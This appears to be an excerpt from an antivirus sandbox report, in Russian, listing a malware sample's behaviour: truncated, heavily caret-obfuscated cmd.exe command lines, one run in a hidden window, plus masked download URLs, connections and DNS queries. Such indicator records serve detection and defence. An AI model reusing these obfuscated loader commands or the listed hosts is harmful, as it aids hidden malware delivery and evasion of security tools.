Техническая информация
- '<SYSTEM32>\cmd.exe' /c ^FOr ; , /^f , " tokens= 2 delims=Q=f0o" ; %c , ; ^in ; ; ( , ' , , A^^s^^S^^OC ; , .^^cmd ' , ) , ; D^O ; %c; ; vzE4iF6MC0/^V^Kf^m^bR^Z^w^ , 6Fri/^c " , ; ( (S^et ^ ^...
- 'il###gunu.com':80
- 'il###gunu.com':443
- 'kr##er.jp':80
- 'im###soft.co.uk':80
- http://www.il###gunu.com/kFln/
- http://kr##er.jp/BGuXnV/
- http://im###soft.co.uk/MjjtX/
- 'il###gunu.com':443
- DNS ASK il###gunu.com
- DNS ASK uk######erresearch.co.uk
- DNS ASK kr##er.jp
- DNS ASK pa###ronik.de
- DNS ASK im###soft.co.uk
- '<SYSTEM32>\cmd.exe' /c ^FOr ; , /^f , " tokens= 2 delims=Q=f0o" ; %c , ; ^in ; ; ( , ' , , A^^s^^S^^OC ; , .^^cmd ' , ) , ; D^O ; %c; ; vzE4iF6MC0/^V^Kf^m^bR^Z^w^ , 6Fri/^c " , ; ( (S^et ^ ^...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c A^s^S^OC .^cmd
- '<SYSTEM32>\cmd.exe' ; ; vzE4iF6MC0/VKfmbRZw , 6Fri/c " , ; ( (S^et ^ ^ $_^@=d^S^ry^vVg$,^0}^:1^Oo^cGFN^-=5^wJujYU^ .Wi^)\^en^kP/bDa'^(^l{^hs;BL+^p@^xZM^zIXt8Q^AmfC) , )& , ; ^f^oR , , %^R ; ; in...